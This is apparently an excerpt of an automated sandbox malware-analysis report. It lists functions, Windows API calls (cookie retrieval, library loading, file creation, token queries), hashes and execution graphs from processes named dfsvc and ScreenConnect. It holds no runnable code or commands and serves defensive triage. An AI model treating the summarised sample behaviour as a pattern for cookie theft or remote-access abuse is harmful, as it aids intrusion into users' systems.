                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                        • Opcode ID: a041926259002ccb0c5bea6036ce399ae8cea24a08f5a4850fb92ad3a2e55c66
                                                                                                                                                                                                                                                        • Instruction ID: b4f85ed933e013af835ac782996b9a4cd5c4c77bdc05f97e3622b00457dbfa77
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a041926259002ccb0c5bea6036ce399ae8cea24a08f5a4850fb92ad3a2e55c66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1101FC3272962AEBC7214A789C44BD7775DAF887A0B134964F916D7140D720DC41C6E0
                                                                                                                                                                                                                                                        Function 009148BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914A27
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: IsProcessorFeaturePresent.KERNEL32(00000017,0091473C,00000000,?,00000004,00000000,?,?,?,?,00914749,00000000,00000000,00000000,00000000,00000000), ref: 0091474F
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00914771
                                                                                                                                                                                                                                                          • Part of subcall function 0091474D: TerminateProcess.KERNEL32(00000000), ref: 00914778
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction ID: a0fe832a98085281cc93d6e85b3964ba2a9f61d74a7a4a6da24da4980a9e8fd8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B517E75F0021EAFDF14CFA8C881AEEB7B9EF9C710F25816AE454E7341E6359A418B50

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:18.9%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:15
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 30125 7ff7bfee0482 30127 7ff7bfee04af InternetGetCookieW 30125->30127 30128 7ff7bfee0679 30127->30128 30115 7ff7bff0ac50 30116 7ff7bff0ac96 30115->30116 30118 7ff7bff0af42 30116->30118 30120 7ff7bfed1608 30116->30120 30119 7ff7bff0b102 30122 7ff7bfed1618 30120->30122 30121 7ff7bfed1683 30121->30119 30122->30121 30123 7ff7bfed1802 LoadLibraryExW 30122->30123 30124 7ff7bfed1836 30123->30124 30124->30119 30129 7ff7bfed994b 30130 7ff7bfed9957 CreateFileW 30129->30130 30132 7ff7bfed9a8c 30130->30132

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF7BFED1618 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 258libraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                        • String ID: x]"
                                                                                                                                                                                                                                                        • API String ID: 1029625771-3896027163
                                                                                                                                                                                                                                                        • Opcode ID: 35623898dd4d808f7358fa656ed50f3010c51765657fe9d862eaa52a6451b6e1
                                                                                                                                                                                                                                                        • Instruction ID: 438901b7b6e0e39d15b81b1ccefe4802c8c4147e5e1e8d42f9e3f09492c8ec2a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35623898dd4d808f7358fa656ed50f3010c51765657fe9d862eaa52a6451b6e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71711931A0CE894FD749EB7C94197F9BBE1EF96320B48426BD00DC7292DE38A815C791
                                                                                                                                                                                                                                                        Function 00007FF7BFEDFEBD Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8ba26799c446a2a2f0f554dfd004f4fcce6e27b8954835e766102c95a3a4689e
                                                                                                                                                                                                                                                        • Instruction ID: 2abb24ade919687ec1eff5e51cf0d6da652addba25ae832023a79de70fb6a4e2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba26799c446a2a2f0f554dfd004f4fcce6e27b8954835e766102c95a3a4689e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F81C230508A8D8FDBA8EF1CD8557F977E1FB99310F00426ED84EC7292CB74A9458B91
                                                                                                                                                                                                                                                        Function 00007FF7BFEE0482 Relevance: 1.8, APIs: 1, Instructions: 264networkCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookieInternet
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 930238652-0
                                                                                                                                                                                                                                                        • Opcode ID: 4faf696c9da0c4bcab01f7940a2fdf18a71a716a7f8218bf459eb10d32cf5339
                                                                                                                                                                                                                                                        • Instruction ID: 11a1e5caa1bf0e41b1b38500852d61adfa192fc0de9f1bd29f2d6471c103d68c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4faf696c9da0c4bcab01f7940a2fdf18a71a716a7f8218bf459eb10d32cf5339
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A81D030508A8D4FDBA9EF2C98557F57BE1EBAA310F04426FD84DC7292CA74A845CB81
                                                                                                                                                                                                                                                        Function 00007FF7BFED994B Relevance: 1.7, APIs: 1, Instructions: 179fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243705183.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfed0000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: f0888b3e0118638dee2865da850f849df17798f0ad4834137a6fbfef150e423d
                                                                                                                                                                                                                                                        • Instruction ID: 564cde9e497aecd8f64f4f866a3c75434ec9e7f9d0246b9c35c3755240063b37
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0888b3e0118638dee2865da850f849df17798f0ad4834137a6fbfef150e423d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA51A07190CA5C8FDB58EF5CD845BE9BBE0FB69310F1442AEE04DD3252CB34A8428B81
                                                                                                                                                                                                                                                        Function 00007FF7BFDBEEBF Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2243201963.00007FF7BFDBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFDBD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff7bfdbd000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8646968d7ed12fc0f494b0c0a2057bde718f26e3bf7e06f116fe92c4fc1c29de
                                                                                                                                                                                                                                                        • Instruction ID: de5d16cc50884bf924c5b3c4bbfec477b679ab7d5840519a4a10d92f6a660c8f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8646968d7ed12fc0f494b0c0a2057bde718f26e3bf7e06f116fe92c4fc1c29de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6841063180DBC45FD3569F2C98559927FF0EF57320B1502EFE088CB1A7D625A846C7A2

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:12
                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                        execution_graph 10384 7ff7bfedf67b 10385 7ff7bfedf687 CreateFileW 10384->10385 10387 7ff7bfedf7bc 10385->10387 10394 7ff7bfeef219 10395 7ff7bfeef223 GetTokenInformation 10394->10395 10397 7ff7bfeef2d7 10395->10397 10391 7ff7bfed84a7 10392 7ff7bfed84f6 SetProcessMitigationPolicy 10391->10392 10393 7ff7bfed8552 10392->10393 10388 7ff7bfeef458 10389 7ff7bfeef49b CloseHandle 10388->10389 10390 7ff7bfeef4eb 10389->10390

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF7BFEDF67B Relevance: 1.7, APIs: 1, Instructions: 178fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 476 7ff7bfedf67b-7ff7bfedf710 480 7ff7bfedf712-7ff7bfedf717 476->480 481 7ff7bfedf71a-7ff7bfedf7ba CreateFileW 476->481 480->481 483 7ff7bfedf7c2-7ff7bfedf7f5 481->483 484 7ff7bfedf7bc 481->484 484->483
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: b3382e6a4a8621df60c2bc3a366b04fca73984eaa4aba6d45eb6901016a28528
                                                                                                                                                                                                                                                        • Instruction ID: 1c3dc5bce8a93904c4b9702a7657f27da0b517eed166f5b36113fbe3b7728ea9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3382e6a4a8621df60c2bc3a366b04fca73984eaa4aba6d45eb6901016a28528
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8151AE7190CA5C9FDB58EF6CD845BE9BBE0FB69310F1442AEE04DD3252CB34A8458B81
                                                                                                                                                                                                                                                        Function 00007FF7BFEEF219 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 486 7ff7bfeef219-7ff7bfeef2d5 GetTokenInformation 489 7ff7bfeef2dd-7ff7bfeef30e 486->489 490 7ff7bfeef2d7 486->490 490->489
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                                                                                                                                        • Opcode ID: a44bf558c7c4f65971f3f8f930d913e0a945e7bd3067e08c15329f1ae9e45cf7
                                                                                                                                                                                                                                                        • Instruction ID: c59413f7a3746809bdd59bd456b402b999708eedebb8a693d87d0751744c0ce7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a44bf558c7c4f65971f3f8f930d913e0a945e7bd3067e08c15329f1ae9e45cf7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A31C97190CB484FDB18DF5CD8466F97BE0EB99321F04426FE049D3252DB7468058792
                                                                                                                                                                                                                                                        Function 00007FF7BFED84A7 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 492 7ff7bfed84a7-7ff7bfed8550 SetProcessMitigationPolicy 494 7ff7bfed8552 492->494 495 7ff7bfed8558-7ff7bfed8587 492->495 494->495
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: b95da480e5902b230fd445c4e44036027acc2bb39b87324c3b0921de205d257e
                                                                                                                                                                                                                                                        • Instruction ID: 5fbb83c47e0735b8beead3490174b958d2dd41cf600102fd695b10f01805b566
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b95da480e5902b230fd445c4e44036027acc2bb39b87324c3b0921de205d257e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E331E47191CB188FD718AF9CDC4A5F9BBE0EB65721F00426FE049D3652DB74B8468B81
                                                                                                                                                                                                                                                        Function 00007FF7BFEEF458 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 553 7ff7bfeef458-7ff7bfeef4e9 CloseHandle 555 7ff7bfeef4f1-7ff7bfeef51f 553->555 556 7ff7bfeef4eb 553->556 556->555
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1773026118.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7bfed0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        • Opcode ID: 6e765bb6397af37bee28614c19ac4baa7429330086f53175d9678aa1d7015d6f
                                                                                                                                                                                                                                                        • Instruction ID: f6d5366bbfaa14540ec35308afea3b1a9b6d690a93364499dbe1c7d5763c77b9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e765bb6397af37bee28614c19ac4baa7429330086f53175d9678aa1d7015d6f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD21DE3190CA4C9FDB58DF9894497F9BBE1EFA6321F00422FD049D3652CB74A856CB81

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 01072013 Relevance: 2.9, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq$
                                                                                                                                                                                                                                                        • API String ID: 0-415435924
                                                                                                                                                                                                                                                        • Opcode ID: 1e58d00dd396d71dc2a0a0b68d5a35ead73df35a9339f883c7894ca78a6d1e21
                                                                                                                                                                                                                                                        • Instruction ID: d6ee63c3ce16bf3d76caebf4d82d6e36a8113b623c52d61f0e3974ee7164d5ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e58d00dd396d71dc2a0a0b68d5a35ead73df35a9339f883c7894ca78a6d1e21
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96610331B002468FDB05EB78D854BAE7BF2EF85214B1482A9C156DB3A2DF70DC42CB95
                                                                                                                                                                                                                                                        Function 010720B5 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCq$
                                                                                                                                                                                                                                                        • API String ID: 0-415435924
                                                                                                                                                                                                                                                        • Opcode ID: b1c5a3151bed2c8e2435a7add429025e1d2fd9a8f4656775ea111b59ef643280
                                                                                                                                                                                                                                                        • Instruction ID: 9ef1a81f356795d89b3d3af8578f6e6d36013e42043536b7d813a68fe29affba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c5a3151bed2c8e2435a7add429025e1d2fd9a8f4656775ea111b59ef643280
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D351C231B002468FD715EB39D8547AE7BF2EF89200B1484A9D586DB3A2EF70DC42CB91
                                                                                                                                                                                                                                                        Function 01075658 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt$t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-1672810414
                                                                                                                                                                                                                                                        • Opcode ID: 8b6abab392a1cf006f76f2460270db39571cdb9989dfc7b8664ef4b708cf854d
                                                                                                                                                                                                                                                        • Instruction ID: d5b637a22bb1594debd4d70d7c60be60ac750b0ee14965a37885818f55060e1f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b6abab392a1cf006f76f2460270db39571cdb9989dfc7b8664ef4b708cf854d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB118E70F00204AFEB64DE69DC00AEBBBF6AFC8610F54C466D594D7250E77199418B94
                                                                                                                                                                                                                                                        Function 01073480 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ['
                                                                                                                                                                                                                                                        • API String ID: 0-410297704
                                                                                                                                                                                                                                                        • Opcode ID: 826483bf6a5007f7924d50370ec2e665839376c8db001fd41eb260d1bc4393ba
                                                                                                                                                                                                                                                        • Instruction ID: 0c2d34f220982468ec0a57742dafad2657f4fbd7b6aa3ae5e48106eeaceaaeae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 826483bf6a5007f7924d50370ec2e665839376c8db001fd41eb260d1bc4393ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46412672B007125FE701AB78A851A5EBBE2FFC5650340C169D846EB351EF60ED068BD2
                                                                                                                                                                                                                                                        Function 01075648 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-3586738584
                                                                                                                                                                                                                                                        • Opcode ID: 2ae987591e393e9cf8afae3e143ae6362ef75aa99ecbb460e500156c4722d02d
                                                                                                                                                                                                                                                        • Instruction ID: a6989d07495a6fa8d96d72bd163be22664ad2affa4ba14a41fb65fc6be2066dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae987591e393e9cf8afae3e143ae6362ef75aa99ecbb460e500156c4722d02d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA119E70E01344AFDB11DF68DC40AEABBB6EFC9610F1484A6D5D49B161E7729A02CB91
                                                                                                                                                                                                                                                        Function 010776E1 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d60daa561ca100f15671e8d7cdaf247e3c15105adf4db2d5e065932909b67be
                                                                                                                                                                                                                                                        • Instruction ID: 65b31499450eaeb365d3e9d5d6dfa81222611bf126292f2d3256463e20545058
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d60daa561ca100f15671e8d7cdaf247e3c15105adf4db2d5e065932909b67be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF517975E003099FDB01EFA8D844BDDBBB2FF89300F108559E005AB2A5EB74A986CF50
                                                                                                                                                                                                                                                        Function 01075238 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a4d3ec86fb7a0080d96f9f06c2986c6d405f0bda22d9a67f5a491d43bdffe791
                                                                                                                                                                                                                                                        • Instruction ID: 43d39f01a4bb1bd6ac332a4e67f65868dc1bb853489dd960c214392c57d91149
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4d3ec86fb7a0080d96f9f06c2986c6d405f0bda22d9a67f5a491d43bdffe791
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB612834B10605CFDB14DFA8E894AAEB7F6FF8D204B148198E546AB365DB70EC41DB40
                                                                                                                                                                                                                                                        Function 01076F48 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 414cba03d52ffee3cc653e43d9a84b3cf92d868749bdfb7d3f8a763b6ea11476
                                                                                                                                                                                                                                                        • Instruction ID: 894adc0dae77cb19c545bab53edc7246734f0e42e747121dbe627d993a88aa80
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 414cba03d52ffee3cc653e43d9a84b3cf92d868749bdfb7d3f8a763b6ea11476
